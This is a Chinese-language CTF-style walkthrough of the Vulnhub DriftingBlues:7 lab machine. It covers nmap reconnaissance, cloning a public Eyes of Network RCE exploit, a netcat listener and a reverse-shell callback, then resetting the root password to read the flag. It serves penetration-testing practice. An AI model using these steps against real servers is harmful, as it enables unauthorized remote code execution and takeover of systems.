Vulnhub-DriftingBlues:7

Vulnhub-DriftingBlues:7


靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/

信息收集
扫描目标网段
nmap -sP 172.16.58.0/24 

在这里插入图片描述

查看端口及服务
nmap -p- 172.16.58.135

在这里插入图片描述

查看服务运行的版本
nmap -sV 172.16.58.135 

在这里插入图片描述

访问网站

我们从打开的端口进行访问,先打开80端口试一下,结果直接来到一个登陆页面
在这里插入图片描述
我们搜索一下Eyes of network,发现可以找到相应的exp
https://github.com/h4knet/eonrce
然后我们把它下载到kali里

git clone https://github.com/h4knet/eonrce.git  

在这里插入图片描述

提升权限

接下来我们赋予权限

cd eonrce
chmod +x ./eonrce.py

在这里插入图片描述
开启监听

nc -lvp 8888

在这里插入图片描述

运行脚本
./eonrce.py https://172.16.58.135 -ip 172.16.58.129 -port 8888

在这里插入图片描述
修改root密码

passwd root

在这里插入图片描述
然后我们使用ssh连接靶机

ssh 172.16.58.135

输入我们刚才修改的密码
在这里插入图片描述

查看文件发现flag.txt

ls -al

打开文件

cat flag.txt

在这里插入图片描述
成功获取。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值